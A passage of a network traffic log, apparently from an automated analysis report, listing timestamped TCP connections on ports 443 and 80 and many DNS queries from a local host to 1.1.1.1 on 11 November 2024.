Nov 11, 2024 18:15:04.331832886 CET	443	64582	188.114.96.3	192.168.2.6
Nov 11, 2024 18:15:04.331856012 CET	64582	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:15:04.331881046 CET	64582	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:15:04.390717983 CET	443	64582	188.114.96.3	192.168.2.6
Nov 11, 2024 18:15:04.390780926 CET	443	64582	188.114.96.3	192.168.2.6
Nov 11, 2024 18:15:04.390815020 CET	443	64582	188.114.96.3	192.168.2.6
Nov 11, 2024 18:15:04.390873909 CET	64582	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:15:04.390885115 CET	443	64582	188.114.96.3	192.168.2.6
Nov 11, 2024 18:15:04.390912056 CET	443	64582	188.114.96.3	192.168.2.6
Nov 11, 2024 18:15:04.390949965 CET	64582	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:15:04.390990973 CET	443	64582	188.114.96.3	192.168.2.6
Nov 11, 2024 18:15:04.391020060 CET	443	64582	188.114.96.3	192.168.2.6
Nov 11, 2024 18:15:04.391057014 CET	64582	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:15:04.391064882 CET	443	64582	188.114.96.3	192.168.2.6
Nov 11, 2024 18:15:04.391110897 CET	64582	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:15:04.391163111 CET	64582	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:15:04.391875982 CET	443	64582	188.114.96.3	192.168.2.6
Nov 11, 2024 18:15:04.391941071 CET	443	64582	188.114.96.3	192.168.2.6
Nov 11, 2024 18:15:04.391947985 CET	64582	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:15:04.391954899 CET	443	64582	188.114.96.3	192.168.2.6
Nov 11, 2024 18:15:04.391994953 CET	443	64582	188.114.96.3	192.168.2.6
Nov 11, 2024 18:15:04.392035961 CET	64582	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:15:04.392040968 CET	443	64582	188.114.96.3	192.168.2.6
Nov 11, 2024 18:15:04.392127037 CET	64582	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:15:04.392695904 CET	443	64582	188.114.96.3	192.168.2.6
Nov 11, 2024 18:15:04.392756939 CET	443	64582	188.114.96.3	192.168.2.6
Nov 11, 2024 18:15:04.392765999 CET	64582	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:15:04.392772913 CET	443	64582	188.114.96.3	192.168.2.6
Nov 11, 2024 18:15:04.392853022 CET	64582	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:15:04.392859936 CET	443	64582	188.114.96.3	192.168.2.6
Nov 11, 2024 18:15:04.392931938 CET	64582	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:15:04.393508911 CET	443	64582	188.114.96.3	192.168.2.6
Nov 11, 2024 18:15:04.393557072 CET	443	64582	188.114.96.3	192.168.2.6
Nov 11, 2024 18:15:04.393579960 CET	64582	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:15:04.393589973 CET	443	64582	188.114.96.3	192.168.2.6
Nov 11, 2024 18:15:04.393665075 CET	64582	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:15:04.471966028 CET	443	64582	188.114.96.3	192.168.2.6
Nov 11, 2024 18:15:04.472021103 CET	443	64582	188.114.96.3	192.168.2.6
Nov 11, 2024 18:15:04.472110033 CET	443	64582	188.114.96.3	192.168.2.6
Nov 11, 2024 18:15:04.472124100 CET	64582	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:15:04.472260952 CET	64582	443	192.168.2.6	188.114.96.3
Nov 11, 2024 18:15:09.389249086 CET	63492	80	192.168.2.6	64.190.63.136
Nov 11, 2024 18:15:09.423600912 CET	63478	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:15:09.503045082 CET	58877	80	192.168.2.6	103.150.10.48
Nov 11, 2024 18:15:09.704860926 CET	63298	80	192.168.2.6	199.59.243.227

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 11, 2024 18:13:00.481395960 CET	53512	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.481751919 CET	61422	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.482038021 CET	63162	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.482369900 CET	51492	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.482758045 CET	64197	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.483153105 CET	60985	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.488621950 CET	60185	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.490200043 CET	50336	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.491722107 CET	53056	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.492011070 CET	53	63162	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.493396044 CET	62428	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.493460894 CET	53	51492	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.494980097 CET	52977	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.496607065 CET	51307	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.497566938 CET	53	64197	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.497773886 CET	49153	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.499360085 CET	64376	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.499924898 CET	53	50336	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.500377893 CET	58040	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.503657103 CET	53	60985	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.505531073 CET	53	52977	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.507329941 CET	53	49153	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.507906914 CET	53	51307	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.510741949 CET	53	58040	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.512943029 CET	53	53512	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.514404058 CET	53	61422	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.520409107 CET	53	60185	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.522640944 CET	53	53056	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.529314041 CET	56280	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.530391932 CET	53	64376	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.531327963 CET	49922	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.538754940 CET	53	56280	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.541436911 CET	53	49922	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.550781965 CET	65529	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.551907063 CET	61829	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.561302900 CET	53	61829	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.581959963 CET	63118	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.589627981 CET	53	63118	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.597763062 CET	52391	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.599937916 CET	58060	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.600162029 CET	65170	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.607372999 CET	53	52391	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.629055023 CET	57363	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.629107952 CET	51000	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.631576061 CET	53	58060	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.638607979 CET	53	51000	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.660089970 CET	56547	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.660089970 CET	58819	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.690432072 CET	53	56547	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.691600084 CET	54701	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.691600084 CET	61858	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.695362091 CET	53	58819	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.701733112 CET	53	54701	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.722234011 CET	60918	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.722274065 CET	49508	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.722973108 CET	53	61858	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.731503963 CET	53	60918	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.732952118 CET	53	49508	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.753813028 CET	63831	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.754457951 CET	50779	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.765234947 CET	53	63831	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.774240971 CET	53	65529	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.785571098 CET	53478	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.785746098 CET	53	50779	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.785768032 CET	62275	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.795208931 CET	53	62275	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.801354885 CET	53	65170	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.816495895 CET	58538	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.816895008 CET	63372	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.827748060 CET	53	63372	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.844214916 CET	53	57363	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.846661091 CET	53	58538	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.847624063 CET	55472	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.847690105 CET	61978	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.877998114 CET	53	61978	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.879206896 CET	53	55472	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.881185055 CET	55962	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.885456085 CET	57247	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.899543047 CET	53	57247	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.916687012 CET	51832	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.917965889 CET	49926	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.920185089 CET	62562	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.920361996 CET	62638	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.920533895 CET	61668	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.925476074 CET	53	51832	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.929377079 CET	53	62562	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.930109024 CET	53	49926	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.930768967 CET	53	62638	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.937433958 CET	53	62428	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.943258047 CET	55513	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.952635050 CET	53	61668	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.954257011 CET	53	55513	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.967644930 CET	59681	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.973874092 CET	57564	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.974134922 CET	49297	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.974189043 CET	64996	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.974340916 CET	58026	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.974416018 CET	58811	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.974817991 CET	61375	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.979260921 CET	53	59681	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.980923891 CET	53	64996	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.984088898 CET	53	53478	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.984100103 CET	53	58811	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.984358072 CET	53	49297	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.989037037 CET	53	57564	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:00.991792917 CET	62583	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.992124081 CET	62317	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.994189024 CET	57128	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.997484922 CET	62491	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.997770071 CET	56767	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:00.998136044 CET	54688	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:01.003547907 CET	64242	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:01.005829096 CET	53	61375	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:01.008578062 CET	53	57128	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:01.009963036 CET	53	54688	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:01.011066914 CET	61666	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:01.011498928 CET	53	64242	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:01.011648893 CET	56868	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:01.018594980 CET	53893	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:01.021811008 CET	53	61666	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:01.022244930 CET	53	62583	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:01.030153990 CET	53	62491	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:01.041740894 CET	53	56868	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:01.121042013 CET	53	55962	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:01.172548056 CET	53	58026	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:01.211354971 CET	53	62317	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:01.234741926 CET	53	53893	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:01.246675968 CET	53	56767	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:04.824131012 CET	53710	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:04.851231098 CET	51225	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:04.853267908 CET	59868	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:04.859343052 CET	53	53710	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:04.880652905 CET	60676	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:04.881987095 CET	59371	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:04.883622885 CET	58712	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:04.884171009 CET	53	59868	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:04.884284019 CET	53	51225	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:04.885565996 CET	65280	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:04.889838934 CET	51697	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:04.892216921 CET	53608	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:04.892612934 CET	53	58712	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:04.893079042 CET	58315	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:04.894937992 CET	53	59371	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:04.895286083 CET	53	65280	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:04.899530888 CET	53	53608	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:04.902462006 CET	53	58315	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:04.906280041 CET	51728	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:04.906454086 CET	58186	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:04.906590939 CET	50257	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:04.906774998 CET	55662	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:04.906899929 CET	50733	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:04.911498070 CET	53	60676	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:04.915771008 CET	63263	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:04.916331053 CET	53	58186	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:04.916605949 CET	53	51728	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:04.916640043 CET	53	50733	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:04.916740894 CET	53	50257	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:04.924478054 CET	53	51697	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:04.925772905 CET	53	63263	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:04.951781034 CET	58393	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:04.953144073 CET	63943	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:04.968777895 CET	53	58393	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:04.983674049 CET	51500	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:04.989972115 CET	49493	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:04.991375923 CET	64594	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:04.994342089 CET	53	51500	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:04.995467901 CET	54377	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:04.996298075 CET	57479	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:04.997622013 CET	49988	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:04.998516083 CET	61042	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:04.998927116 CET	55118	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:05.000077963 CET	59588	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:05.000868082 CET	60203	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:05.002047062 CET	59912	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:05.003528118 CET	59793	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:05.004714012 CET	52913	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:05.005507946 CET	53	57479	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:05.005692005 CET	58073	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:05.006777048 CET	55845	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:05.006974936 CET	54949	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:05.007296085 CET	53	49988	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:05.008454084 CET	64172	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:05.008663893 CET	53	61042	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:05.009274006 CET	57585	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:05.010601044 CET	53	59588	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:05.011411905 CET	53	60203	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:05.013659954 CET	53	59793	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:05.014492989 CET	53	54377	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:05.015151024 CET	53	55845	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:05.015405893 CET	53	58073	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:05.015732050 CET	55630	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:05.016840935 CET	50425	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:05.017164946 CET	53	54949	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:05.019479990 CET	53	57585	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:05.019961119 CET	54744	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:05.020961046 CET	53	49493	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:05.021548986 CET	57031	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:05.021863937 CET	53	64594	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:05.022109985 CET	62891	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:05.023583889 CET	57350	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:05.024159908 CET	50734	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:05.025298119 CET	57433	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:05.026231050 CET	53	55630	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:05.026283979 CET	53079	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:05.027107000 CET	59120	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:05.031053066 CET	65283	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:05.031212091 CET	53464	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:05.032042027 CET	64064	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:05.033179998 CET	53459	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:05.033796072 CET	64014	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:05.034616947 CET	59975	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:05.046180010 CET	53	54744	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:05.046192884 CET	53	55118	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:05.046214104 CET	53	59912	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:05.046251059 CET	53	52913	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:05.046260118 CET	53	64172	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:05.049031973 CET	53	50425	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:05.051028967 CET	53	53079	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:05.051620007 CET	53	57433	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:05.053740978 CET	53	53464	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:05.053795099 CET	53	57031	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:05.053805113 CET	53	64064	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:05.053816080 CET	53	64014	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:05.053910017 CET	53	59975	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:05.054917097 CET	53	65283	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:05.073045969 CET	53	57350	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:05.073626995 CET	53	59120	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:05.073637962 CET	53	62891	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:05.075634003 CET	53	53459	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:05.129367113 CET	53	55662	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:05.145898104 CET	51632	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:05.152420044 CET	50879	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:05.155678034 CET	53	51632	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:05.156913042 CET	52675	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:05.159832954 CET	60406	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:05.163007021 CET	53	50879	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:05.166435957 CET	53	52675	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:05.170006037 CET	52449	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:05.191023111 CET	53	60406	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:05.201185942 CET	53	52449	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:05.209096909 CET	63305	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:05.217833042 CET	53	63305	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:05.227040052 CET	52309	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:05.228208065 CET	53114	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:05.229670048 CET	51201	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:05.236402035 CET	53	52309	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:05.259545088 CET	53	53114	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:05.259974003 CET	53	51201	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:05.269134045 CET	62756	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:05.269896984 CET	54402	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:05.270788908 CET	61387	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:05.641787052 CET	53	61387	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:05.641803026 CET	53	50734	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:05.642106056 CET	53	62756	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:05.642117023 CET	53	54402	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:05.646610975 CET	53	63943	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:11.626756907 CET	62053	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:11.627233982 CET	54028	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:11.627679110 CET	61127	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:11.628077030 CET	53003	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:11.634454966 CET	63310	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:11.635454893 CET	57339	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:11.636738062 CET	54411	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:11.637120962 CET	53	54028	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:11.637501955 CET	53	62053	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:11.637970924 CET	53	61127	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:11.638159037 CET	53	53003	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:11.645538092 CET	53	57339	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:11.646284103 CET	53	54411	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:11.666718006 CET	56768	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:11.683963060 CET	53	56768	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:11.690654993 CET	53	63310	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:11.707135916 CET	64016	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:11.712532043 CET	52182	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:11.716716051 CET	64790	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:11.717837095 CET	53	64016	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:11.721795082 CET	58468	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:11.722796917 CET	53	52182	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:11.726191998 CET	53	64790	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:11.732661963 CET	53	58468	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:11.747279882 CET	58607	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:11.747648001 CET	52775	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:11.757385969 CET	53	52775	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:11.781661987 CET	53	58607	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:11.792717934 CET	63583	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:11.793483973 CET	56142	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:11.794289112 CET	51010	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:11.799484968 CET	55503	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:11.803673983 CET	53	51010	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:11.804311991 CET	53	56142	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:11.813673973 CET	49624	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:11.823837042 CET	53	49624	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:11.830540895 CET	53	55503	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:11.844245911 CET	62553	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:11.847687960 CET	56219	53	192.168.2.6	1.1.1.1
